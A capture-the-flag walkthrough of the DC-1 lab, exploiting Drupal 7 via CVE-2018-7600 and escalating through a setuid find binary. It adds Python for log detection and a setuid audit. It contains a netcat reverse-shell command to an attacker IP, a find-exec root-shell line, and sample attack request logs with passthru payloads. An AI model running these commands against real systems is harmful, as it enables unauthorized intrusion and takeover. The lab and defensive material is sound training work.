Proving Grounds: DC-1 Walkthrough
DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. It was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn. To successfully complete this challenge, you will require Linux skills, familiarity with the Linux command line and experience with basic penetration testing tools, such as the tools that can be found on Kali Linux, or Parrot Security OS.
There are multiple ways of gaining root; however, I have included some flags which contain clues for beginners. There are five flags in total, but the ultimate goal is to find and read the flag in root’s home directory. You don’t even need to be root to do this; however, you will require root privileges. Depending on your skill level, you may be able to skip finding most of these flags and go straight for root. Beginners may encounter challenges that they have never come across previously, but a Google search should be all that is required to obtain the information required to complete this challenge.
Let’s start with first things first: quickly run an nmap scan to see which ports are open and what services are running on the box.
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-12 08:10 EDT
Nmap scan report for 192.168.181.193
Host is up (0.15s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-title: Welcome to Drupal Site | Drupal Site
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-generator: Drupal 7 (http://drupal.org)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 46232/tcp status
| 100024 1 48086/tcp6 status
| 100024 1 53990/udp status
|_ 100024 1 57904/udp6 status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.50 seconds
We can see that port 80 is open, so let’s enumerate it.
The page suggests it’s running the Drupal CMS. I looked into robots.txt, which has 36 disallowed entries. There were many interesting entries (like install.php, upgrade.php, LICENSE.txt), and I visited each of the listed entries but could not find anything that would take us further: either I was not authorized to view them, or the ones I was able to view were not of any help. I played around with the login and other pages but could not find a way in. So I checked this CMS against Wappalyzer to see what version of Drupal is running on the box (the nmap http-generator line above already reported Drupal 7).
So I started searching for Drupal 7 exploits on Google and found one.
Drupal RCE CVE-2018-7600
Description:
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.
python3 drupa7-CVE-2018-7600.py http://192.168.56.193/ -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.56 1234 >/tmp/f"
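The description above gives the attacker’s view of CVE-2018-7600; as an added example (my own code, not part of this write-up and not the exploit script it runs), the Python below shows the defender’s view of the same bug. hash_keys_in_request() pulls '#'-prefixed Form API keys out of a request’s parameter names and Drupal path segments, scan_log() runs that check over Apache access-log lines, and sanitize_request() mirrors the fix Drupal 7.58 shipped: every request key that starts with '#' is stripped before it can reach the Form API. The log lines, IP addresses and function names are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache combined log format; only the fields the check needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Form API render-array keys (#post_render, #pre_render, #lazy_builder, #markup,
# #value, ...) are what CVE-2018-7600 injects. No legitimate client sends a
# parameter *name* that contains '#', so the presence of one is the signal.
HASH_KEY = re.compile(r"#\w+")


def hash_keys_in_request(target):
    """Return the '#'-prefixed keys found in a request target (path plus query).

    Parameter names are inspected after percent-decoding (parse_qsl decodes once;
    the extra unquote catches double-encoded '%2523'). Path segments, including the
    Drupal path carried in ?q= when clean URLs are off, are checked because the
    Drupal 7 file/ajax callback takes the render key from the path.
    """
    parts = urlsplit(target)
    found = set()
    segments = parts.path.split("/")
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        found.update(HASH_KEY.findall(unquote(name)))
        if unquote(name) == "q":
            segments.extend(value.split("/"))
    for segment in segments:
        decoded = unquote(unquote(segment))
        if decoded.startswith("#"):
            found.add(decoded)
    return sorted(found)


def scan_line(line):
    """Parse one access-log line; return a hit dict if it carries render-array keys."""
    m = LOG_RE.match(line)
    if not m:
        return None
    keys = hash_keys_in_request(m.group("target"))
    if not keys:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"), "method": m.group("method"),
            "status": m.group("status"), "keys": keys}


def scan_log(lines):
    """Run scan_line over an iterable of log lines and collect the hits."""
    return [hit for hit in (scan_line(line) for line in lines) if hit]


def sanitize_request(data):
    """Drop every key starting with '#' from a nested request structure.

    This is the shape of the fix in Drupal 7.58 / 8.5.1: a request sanitizer that
    strips such keys from GET, POST and COOKIE data before the Form API sees them.
    """
    if isinstance(data, dict):
        return {k: sanitize_request(v) for k, v in data.items()
                if not str(k).startswith("#")}
    if isinstance(data, list):
        return [sanitize_request(v) for v in data]
    return data


# Constructed sample log: stage one of the exploit (GET), a benign page view,
# stage two (POST to the file/ajax callback), and a benign request whose *value*
# contains '#' and must not be flagged.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Jul/2023:08:15:02 -0400] "GET /?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=CMD HTTP/1.1" 200 512 "-" "python-requests/2.31"
198.51.100.7 - - [12/Jul/2023:08:15:09 -0400] "GET /?q=node/1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Jul/2023:08:15:11 -0400] "POST /?q=file/ajax/name/%23value/form-abc123 HTTP/1.1" 200 128 "-" "python-requests/2.31"
198.51.100.7 - - [12/Jul/2023:08:15:20 -0400] "GET /?q=node/1&title=C%23+tutorial HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG.splitlines()):
        print(hit)
```

Access logs only record the request line, so this catches the GET stage of the exploit; the POST stage is visible only to a WAF, to Drupal’s own request sanitizer, or to body-level logging such as mod_security. A hit from one source IP followed by a 200 and a new outbound connection from the web server (the reverse shell the command above spawns) is the signal to pivot on during incident response.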
Now let’s submit local.txt and move on to the privilege escalation part.
So we have found a program with the setuid bit on: find. Let’s use it to view the /root directory. Here you need some knowledge of the Linux command line. With the find command, one can perform user-defined actions using -ok or -exec; we will use -exec to execute arbitrary commands with find. First, we will list the /root directory to find out the name of our flag file.
find /root/thefinalflag.txt -exec /bin/sh \;
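From the defender’s side, the lesson of this step is that a setuid-root copy of any general-purpose tool (find, editors, interpreters) is equivalent to a root shell, and the fix is simply to clear the bit. As an added example (my own code, not part of this write-up), the Python audit below walks a filesystem, lists every setuid regular file, reports those missing from a baseline and those that are known shell-capable tools, and can clear the bit. The SHELL_CAPABLE set and the baseline handling are assumptions for the example; populate the baseline from a clean install of the same distribution.

```python
import os
import stat
import sys

# Setuid binaries that double as "run a command" tools. Constructed for this
# example; extend it from your own review.
SHELL_CAPABLE = {"find", "vim", "vi", "nmap", "python", "python3", "perl",
                 "bash", "sh", "awk", "less", "more", "env"}

# Pseudo-filesystems that are never worth descending into.
SKIP_DIRS = ("/proc", "/sys", "/dev", "/run")


def find_suid(root="/", follow_links=False):
    """Return sorted paths of all regular files under root with the setuid bit set.

    Permission errors are swallowed so an unprivileged audit still completes;
    symlinks are lstat'ed so a link to a setuid file is not reported twice.
    """
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None,
                                                followlinks=follow_links):
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def classify(suid_paths, baseline):
    """Split setuid paths into (unexpected, risky).

    unexpected: not present in the baseline allowlist of paths.
    risky: basename is a known shell-capable tool, whatever the baseline says.
    """
    unexpected = [p for p in suid_paths if p not in baseline]
    risky = [p for p in suid_paths if os.path.basename(p) in SHELL_CAPABLE]
    return unexpected, risky


def remediate(path, dry_run=True):
    """Clear the setuid bit (the equivalent of chmod u-s) and return the new mode.

    With dry_run=True nothing is changed; the returned mode is what would be set.
    """
    new_mode = stat.S_IMODE(os.stat(path).st_mode) & ~stat.S_ISUID
    if not dry_run:
        os.chmod(path, new_mode)
    return new_mode


def load_baseline(path):
    """Read one allowed setuid path per line; blank lines and '#' comments ignored."""
    with open(path) as fh:
        return {line.strip() for line in fh
                if line.strip() and not line.startswith("#")}


if __name__ == "__main__":
    # usage: suid_audit.py [ROOT] [BASELINE_FILE]
    root = sys.argv[1] if len(sys.argv) > 1 else "/"
    baseline = load_baseline(sys.argv[2]) if len(sys.argv) > 2 else set()
    found = find_suid(root)
    unexpected, risky = classify(found, baseline)
    print(f"{len(found)} setuid files under {root}")
    for p in unexpected:
        print("UNEXPECTED", p)
    for p in risky:
        print("RISKY     ", p, "-> would set mode %o" % remediate(p, dry_run=True))
```

Run it periodically (or from a file-integrity monitor) and treat any change in the setuid list as a finding; on a box like DC-1 the single line `RISKY /usr/bin/find` is the whole privilege-escalation path, and `chmod u-s /usr/bin/find` closes it without breaking anything that find is legitimately used for.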
Stay tuned :) for the next write-up.